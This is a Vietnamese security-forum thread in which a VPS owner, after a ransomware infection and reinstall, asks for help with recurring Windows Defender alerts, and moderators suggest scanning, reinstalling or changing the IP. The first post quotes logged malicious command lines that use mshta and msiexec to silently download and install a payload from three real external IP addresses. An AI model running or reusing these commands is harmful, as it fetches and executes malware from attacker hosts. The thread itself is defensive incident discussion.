VPS cài lại sau khi bị ramsomeware, bị dò tấn công

Thảo luận trong 'Virus/Malware' bắt đầu bởi vitinhcomputer, 22/08/20, 09:08 AM.

  1. vitinhcomputer

    vitinhcomputer W-------

    Tham gia: 05/07/16, 01:07 PM
    Bài viết: 22
    Đã được thích: 3
    Điểm thành tích:
    3
    Hi mọi người,

    Mình có VPS chạy windows server 2016 chạy 2,3 web trang aspx và MS SQL lúc trước bị nhiễm ransomware. Sau đó mình đã cài đặt lại và chạy lại. Nhưng sau đó kiểm tra thấy logs chương trình diệt viruts windows defender cảnh báo rất nhiều Trojan bị quét khi kết nối tới VPS từ nhiều IP nguồn khác nhau và xuất hiện nhiều file lạ và thư mục lạ trong đường dẫn C://ProgramData/
    Ngày nào mình kiểm tra cũng thấy có cảnh báo Trojan kết nối tới
    Logs Windows Defender
    Items:
    CmdLine:C:\Windows\System32\cmd.exe /c mshta vbscript:createobject(wscript.shell).run(Cmd /c for /d %i in (103.107.188.190:18065 113.230.237.7:16869 155.138.159.232:17445) do Msiexec /i http://%i/785AD053.moe /Q,0)(window.close)
    CmdLine:C:\Windows\System32\mshta.exe vbscript:createobject(wscript.shell).run(Cmd /c for /d %i in (103.107.188.190:18065 113.230.237.7:16869 155.138.159.232:17445) do Msiexec /i http://%i/785AD053.moe /Q,0)(window.close)

    upload_2020-8-22_9-30-2.png


    VPS này mình chỉ chạy web, đã đổi port RDP, Block các port 445, 139, 138, 137.
    mình disable luôn cmd và powershell
    Mình không rành về bảo mật nhờ mọi người tư vấn giải pháp giúp
    Cảm ơn nhiều!
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. DiepNV88

    DiepNV88 Super Moderator Thành viên BQT

    Tham gia: 24/09/13, 03:09 AM
    Bài viết: 1,538
    Đã được thích: 342
    Điểm thành tích:
    83
    Bạn dùng Window Defender scan full toàn bộ máy diệt nốt những con virus còn ẩn nấp sau đó tiếp tục theo dõi log.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. HustReMw

    HustReMw Moderator Thành viên BQT

    Tham gia: 20/12/16, 05:12 PM
    Bài viết: 474
    Đã được thích: 217
    Điểm thành tích:
    43
    Trên server của bạn bị nhiễm virus rồi nhé. Nếu bạn không có kinh nghiệm rà soát virus, điều tra nguyên nhân tấn công, mình khuyên bạn nên cài lại win bạn ạ.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. vitinhcomputer

    vitinhcomputer W-------

    Tham gia: 05/07/16, 01:07 PM
    Bài viết: 22
    Đã được thích: 3
    Điểm thành tích:
    3
    Sau khi bị ransomeware, mình đã format cài lại toàn bộ, update windows mới nhất đổi port RDP, Block các port 445, 139, 138, 137. nhưng vẫn bị, check log Window Defender thì ngày nào mình cũng thấy có request tới, mình chặn IP nguồn thì thấy IP nguồn thay đổi liên tục.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. vohai2003

    vohai2003 Active Member

    Tham gia: 15/05/20, 09:05 PM
    Bài viết: 37
    Đã được thích: 4
    Điểm thành tích:
    8
    Nếu bạn ko phiền, có thể cho mình IP để mình thử dò xem.
    Thanks.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. vohai2003

    vohai2003 Active Member

    Tham gia: 15/05/20, 09:05 PM
    Bài viết: 37
    Đã được thích: 4
    Điểm thành tích:
    8
    Bạn chạy netstat -a thử xem. Xong đăng kết quả lên mọi người xem nhé
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. vitinhcomputer

    vitinhcomputer W-------

    Tham gia: 05/07/16, 01:07 PM
    Bài viết: 22
    Đã được thích: 3
    Điểm thành tích:
    3
    Mình check netstat - a

    Proto Local Address Foreign Address State
    TCP 127.0.0.1:50645 mewebmail:50646 ESTABLISHED
    TCP 127.0.0.1:50646 mewebmail:50645 ESTABLISHED
    TCP 210.2.x.x:53 HOST-PC:0 LISTENING
    TCP 210.2.x.x:80 crawl-66-249-64-37:42493 ESTABLISHED
    TCP 210.2.x.x:139 HOST-PC:0 LISTENING
    TCP 210.2.x.x:1209 static:35902 ESTABLISHED
    TCP 210.2.x.x:1433 HOST-PC:50577 ESTABLISHED
    TCP 210.2.x.x:1433 HOST-PC:63937 ESTABLISHED
    TCP 210.2.x.x:1433 HOST-PC:63940 ESTABLISHED
    TCP 210.2.x.x:49690 40.90.189.152:https ESTABLISHED
    TCP 210.2.x.x:50577 HOST-PC:ms-sql-s ESTABLISHED
    TCP 210.2.x.x:50578 ip15:3341 ESTABLISHED
    TCP 210.2.x.x:50649 172.65.32.248:https ESTABLISHED
    TCP 210.2.x.x:55404 94.103.35.18:3333 ESTABLISHED
    TCP 210.2.x.x:63937 HOST-PC:ms-sql-s ESTABLISHED
    TCP 210.2.x.x:63940 HOST-PC:ms-sql-s ESTABLISHED
    TCP 210.2.x.x:63951 20.190.140.100:https SYN_SENT
    TCP [::1]:8306 HOST-PC:62415 ESTABLISHED
    TCP [::1]:62415 HOST-PC:8306 ESTABLISHED
    TCP [fe80::19af:bf3d:c7c3:3000%6]:53 HOST-PC:0 LISTENING
    UDP 0.0.0.0:123 *:*
    UDP 0.0.0.0:500 *:*
    UDP 0.0.0.0:1209 *:*
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. vohai2003

    vohai2003 Active Member

    Tham gia: 15/05/20, 09:05 PM
    Bài viết: 37
    Đã được thích: 4
    Điểm thành tích:
    8
    Bạn chạy thêm netstat -b nữa. Nó sẽ hiện lên tất cả phần mềm đang kết nối.
    Nếu thấy thằng nào lạ thì post lên cho ae check.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,779
    Đã được thích: 421
    Điểm thành tích:
    83
    Bạn đổi IP khác đi, khả năng IP con VPS của bạn nằm trong list scan của botnet nào đó rồi.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan